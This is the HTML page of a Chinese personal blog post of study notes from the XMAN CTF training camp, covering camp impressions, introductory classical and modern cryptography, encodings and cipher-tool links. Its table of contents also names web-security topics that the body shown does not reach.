<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head>
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.2 -->
    <script>
        window.materialVersion = "1.5.2"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">














    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            xman笔记 | 
        
        RingFa1l
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="/img/ling.png">
    <link rel="icon" href="/img/ling.png">

    <meta name="format-detection" content="telephone=no"/>
    <meta name="description" itemprop="description" content="">
    <meta name="keywords" content="null">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","/css/material.min.css?Z7a72R1E4SxzBKR/WGctOA==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","/css/style.min.css?MKetZV3cUTfDxvMffaOezg==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #00838F;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #0097A7 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #0097A7 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #0097A7 !important;
  }

  .toTop {
    background: #757575 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #757575;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #757575;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #757575;
  }

  .post-toc a:hover {
    color: #00838F;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-color: #F5F5F5;
      }

      /* blog_info bottom background */
      #scheme-Paradox .material-layout .something-else .mdl-card__supporting-text{
        background-color: #fff;
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","/css/material-icons.css?pqhB/Rd/ab0H2+kZp0RDmw==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","/js/jquery.min.js?qcusAULNeBksqffqUM2+Ig==", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="RingFa1l">
    <meta name="msapplication-starturl" content="http://ringfall.me/2017/08/02/xman/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="RingFa1l">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="/img/ling.png">

    <!-- Site Verification -->
    
    

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="http://ringfall.me/2017/08/02/xman/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="xman笔记 | RingFa1l">
    <meta property="og:image" content="/img/ling.png">
    <meta property="og:description" content="">
    

    
        <meta property="article:published_time" content="Wed Aug 02 2017 08:59:43 GMT+0800">
        <meta property="article:modified_time" content="Sun Apr 22 2018 21:45:04 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="http://ringfall.me/2017/08/02/xman/index.html" />
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "http://ringfall.me/2017/08/02/xman/index.html",
    "headline": "xman笔记",
    "datePublished": "Wed Aug 02 2017 08:59:43 GMT+0800",
    "dateModified": "Sun Apr 22 2018 21:45:04 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "铃落",
        "image": {
            "@type": "ImageObject",
            "url": "/img/2.jpg"
        },
        "description": "铃音不才，纷落为歌。"
    },
    "publisher": {
        "@type": "Organization",
        "name": "RingFa1l",
        "logo": {
            "@type":"ImageObject",
            "url": "/img/ling.png"
        }
    },
    "keywords": "null",
    "description": "",
}
</script>


    

    <!-- Analytics -->
    
        <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
    ga('create', 'UA-119110906-1', 'auto');ga('send', 'pageview');
</script>
    
    
    

    <!-- Custom Head -->
    

</head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                

                <!-- Main Container -->
                <main class="material-layout__content" id="main">

                    <!-- Top Anchor -->
                    <div id="top"></div>

                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span class="MD-burger-layer"></span>
                        </button>
                    

                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn"
        class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x00-･ω･｀"><span class="post-toc-number">1.</span> <span class="post-toc-text">0x00 |･ω･｀)</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#枣起"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">枣起</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Team-Building"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">Team Building</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#诸葛大大哒讲话"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">诸葛大大哒讲话</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#白掌门哒谆谆教诲"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">白掌门哒谆谆教诲</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#晚安安"><span class="post-toc-number">1.5.</span> <span class="post-toc-text">晚安安</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x01-密码"><span class="post-toc-number">2.</span> <span class="post-toc-text">0x01 密码</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#基础姿势"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">基础姿势</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#古典密码"><span class="post-toc-number">2.2.</span> <span class="post-toc-text">古典密码</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#单表代换加密"><span class="post-toc-number">2.2.1.</span> <span class="post-toc-text">单表代换加密</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#多表代换加密"><span class="post-toc-number">2.2.2.</span> <span class="post-toc-text">多表代换加密</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#其他"><span class="post-toc-number">2.2.3.</span> <span class="post-toc-text">其他</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#现代密码"><span class="post-toc-number">2.3.</span> <span class="post-toc-text">现代密码</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#哈希函数"><span class="post-toc-number">2.4.</span> <span class="post-toc-text">哈希函数</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#编码"><span class="post-toc-number">2.5.</span> <span class="post-toc-text">编码</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#工具"><span class="post-toc-number">2.6.</span> <span class="post-toc-text">工具</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x02-misc"><span class="post-toc-number">3.</span> <span class="post-toc-text">0x02 misc</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#信息收集"><span class="post-toc-number">3.1.</span> <span class="post-toc-text">信息收集</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#encode"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">encode</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#取证-amp-隐写"><span class="post-toc-number">3.3.</span> <span class="post-toc-text">取证&隐写</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x02-安卓"><span class="post-toc-number">4.</span> <span class="post-toc-text">0x02 安卓</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x03-逆向"><span class="post-toc-number">5.</span> <span class="post-toc-text">0x03 逆向</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x04-web"><span class="post-toc-number">6.</span> <span class="post-toc-text">0x04 web</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#套路"><span class="post-toc-number">6.1.</span> <span class="post-toc-text">套路</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#XSS"><span class="post-toc-number">6.2.</span> <span class="post-toc-text">XSS</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#CSRF"><span class="post-toc-number">6.3.</span> <span class="post-toc-text">CSRF</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#SQLi"><span class="post-toc-number">6.4.</span> <span class="post-toc-text">SQLi</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#文件包含和文件上传"><span class="post-toc-number">6.5.</span> <span class="post-toc-text">文件包含和文件上传</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#变量覆盖"><span class="post-toc-number">6.6.</span> <span class="post-toc-text">变量覆盖</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#代码审计"><span class="post-toc-number">6.7.</span> <span class="post-toc-text">代码审计</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x05-SQLi"><span class="post-toc-number">7.</span> <span class="post-toc-text">0x05 SQLi</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#union注入"><span class="post-toc-number">7.1.</span> <span class="post-toc-text">union注入</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#报错注入"><span class="post-toc-number">7.2.</span> <span class="post-toc-text">报错注入</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#boolean盲注"><span class="post-toc-number">7.3.</span> <span class="post-toc-text">boolean盲注</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Timing盲注"><span class="post-toc-number">7.4.</span> <span class="post-toc-text">Timing盲注</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#文件读写"><span class="post-toc-number">7.5.</span> <span class="post-toc-text">文件读写</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#waf"><span class="post-toc-number">7.6.</span> <span class="post-toc-text">waf</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#这个啥。。写脚本"><span class="post-toc-number">7.7.</span> <span class="post-toc-text">这个啥。。写脚本</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#杂技"><span class="post-toc-number">7.8.</span> <span class="post-toc-text">杂技</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x05-文件"><span class="post-toc-number">8.</span> <span class="post-toc-text">0x05 文件</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#LFI"><span class="post-toc-number">8.1.</span> <span class="post-toc-text">LFI</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#RFI"><span class="post-toc-number">8.2.</span> <span class="post-toc-text">RFI</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#文件上传"><span class="post-toc-number">8.3.</span> <span class="post-toc-text">文件上传</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x06-XSS"><span class="post-toc-number">9.</span> <span class="post-toc-text">0x06 XSS</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#CSRF-1"><span class="post-toc-number">10.</span> <span class="post-toc-text">CSRF</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#域、同源策略、CORS、JSONP"><span class="post-toc-number">11.</span> <span class="post-toc-text">域、同源策略、CORS、JSONP</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#CSP"><span class="post-toc-number">12.</span> <span class="post-toc-text">CSP</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#else"><span class="post-toc-number">13.</span> <span class="post-toc-text">else</span></a></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        <!-- Custom Thumbnail -->
        <div class="post_thumbnail-custom mdl-card__media mdl-color-text--grey-50" style="background-image:url(https://s1.ax1x.com/2018/01/01/pSoxL4.jpg)">
    
            <p class="article-headline-p">
                xman笔记
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="/img/2.jpg" width="44px" height="44px" alt="Author Avatar"/>
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>铃落</strong>
        <span>8月 02, 2017</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    

    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=xman笔记&url=http://ringfall.me/2017/08/02/xman/index.html&pic=http://ringfall.me/img/ling.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=xman笔记&url=http://ringfall.me/2017/08/02/xman/index.html&via=铃落" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=http://ringfall.me/2017/08/02/xman/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    
        <a class="post_share-link" href="https://plus.google.com/share?url=http://ringfall.me/2017/08/02/xman/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Google+
            </li>
        </a>
    

    <!-- Share LinkedIn -->
    

    <!-- Share QQ -->
    
        <a class="post_share-link" href="http://connect.qq.com/widget/shareqq/index.html?site=RingFa1l&title=xman笔记&summary=null&pics=http://ringfall.me/img/ling.png&url=http://ringfall.me/2017/08/02/xman/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 QQ
            </li>
        </a>
    

    <!-- Share Telegram -->
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <h2 id="0x00-･ω･｀"><a href="#0x00-･ω･｀" class="headerlink" title="0x00 |･ω･｀)"></a>0x00 |･ω･｀)</h2><h3 id="枣起"><a href="#枣起" class="headerlink" title="枣起"></a>枣起</h3><p>前一天和妹子们修仙聊人生聊到夜半，全程瑟瑟发抖ORZ，膜小姐姐们，抱腿prprpr</p>
<h3 id="Team-Building"><a href="#Team-Building" class="headerlink" title="Team Building"></a>Team Building</h3><p>可以光明正大地投靠大佬惹~萌新继续瑟瑟发抖ing<br>然后一整个队都始终在暗中观察2333(橘喵微笑脸<br>而且！在队里活捉一只大角虫欸~~~<br>数独最后几个空发现血崩的时候大家都慈祥地微笑(bu</p>
<h3 id="诸葛大大哒讲话"><a href="#诸葛大大哒讲话" class="headerlink" title="诸葛大大哒讲话"></a>诸葛大大哒讲话</h3><p>%%%%%%%%%%%%%%%%%%%%%%%%%%%%先膜为敬<br>对ctf有了更多的了解啦~<br>也有了更深的执念和动力吧~<br>hacker就是超~帅嘛</p>
<h3 id="白掌门哒谆谆教诲"><a href="#白掌门哒谆谆教诲" class="headerlink" title="白掌门哒谆谆教诲"></a>白掌门哒谆谆教诲</h3><p>虽然一直觉得hacker就应该是无拘无束的吖，不过还是要守法吧，毕竟窝们哒种花家它也是很努力的呢~<br>–从来就没有什么岁月静好，只是有人替我们负重前行。–<br>虽然所有所有的机制啊都还远不够完美，但我们的安全总是有祖国在保护着的啊，表白一发窝大天朝2333</p>
<h3 id="晚安安"><a href="#晚安安" class="headerlink" title="晚安安"></a>晚安安</h3><p>码字和撸代码都是异曲同工，夜越深越爽吖~WA~</p>
<h2 id="0x01-密码"><a href="#0x01-密码" class="headerlink" title="0x01 密码"></a>0x01 密码</h2><p>《线上幽灵》</p>
<h3 id="基础姿势"><a href="#基础姿势" class="headerlink" title="基础姿势"></a>基础姿势</h3><p>Alice-Bob 第三方Oscar<br>明文P 密文C 秘钥K<br>对称密码体制：加密解密法则一样，一个秘钥<br>穷举/统计分析/数学分析攻击<br>唯密文/已知明文/选择明文/选择密文攻击<br>计算/可证明/无条件安全性</p>
<h3 id="古典密码"><a href="#古典密码" class="headerlink" title="古典密码"></a>古典密码</h3><h4 id="单表代换加密"><a href="#单表代换加密" class="headerlink" title="单表代换加密"></a>单表代换加密</h4><p>暴力破解 词频分析（e和t最多）<br>欧拉定理：对任意互素的a和n，有：a^φ(n) ≡ 1 (mod n)<br>mod 26<br>移位密码-&gt;恺撒密码 仿射密码 埃特巴什码</p>
<h4 id="多表代换加密"><a href="#多表代换加密" class="headerlink" title="多表代换加密"></a>多表代换加密</h4><p>playfair polybius/棋盘密码 nihilist hill（希尔密码）<br>维吉尼亚密码 kasiski测试法/重合指标法<br>autokey cipher（自动秘钥密码）</p>
<h4 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h4><p>培根密码 莫尔斯电码 栅栏密码 曲路密码 列移位密码 猪圈密码 键盘密码 手机/电脑键盘密码 QWE密码（QWE=ABC）</p>
<h3 id="现代密码"><a href="#现代密码" class="headerlink" title="现代密码"></a>现代密码</h3><p>对称算法包括序列算法（流密码）和分组算法<br>混乱、扩散<br>DES 好复杂QAQ 轮秘钥+S盒置换+P盒置换<br>AES 比较安全<br>RC5<br>……<br>非对称算法<br>陷门单向函数<br>RSA<br>p,q选取不当:|p-q|大<br>共模攻击<br>小公钥指数攻击<br>零知识证明 完备性 可靠性 零知识 -&gt; fait-shamir协议</p>
<h3 id="哈希函数"><a href="#哈希函数" class="headerlink" title="哈希函数"></a>哈希函数</h3><p>md5（32或16位） 填充-初始化变量-处理分组数据…<br>sha1</p>
<h3 id="编码"><a href="#编码" class="headerlink" title="编码"></a>编码</h3><p>ASCII base64/32/16 shellcode quoted-printable XXencode UUencode url unicode utf-8 敲击码</p>
<h3 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h3><p><a href="http://quipqiup.com/" target="_blank" rel="external">http://quipqiup.com/</a><br><a href="http://www.dmd5.com/" target="_blank" rel="external">http://www.dmd5.com/</a><br><a href="http://www.cryptool-online.org/" target="_blank" rel="external">http://www.cryptool-online.org/</a><br><a href="http://rumkin.com/tools/cipher/" target="_blank" rel="external">http://rumkin.com/tools/cipher/</a><br>yafu<br>万能解码工具 CAP</p>
<h2 id="0x02-misc"><a href="#0x02-misc" class="headerlink" title="0x02 misc"></a>0x02 misc</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>recon</p>
<h3 id="encode"><a href="#encode" class="headerlink" title="encode"></a>encode</h3><p>曼彻斯特/差分曼彻斯特<br>二进制（空格tab/二维码/图片转化）注意分组<br>base64（隐写（对比解码后编码和原串）：=默认删除最后八位）<br>图形码<br>工具 JPK CTFCrack</p>
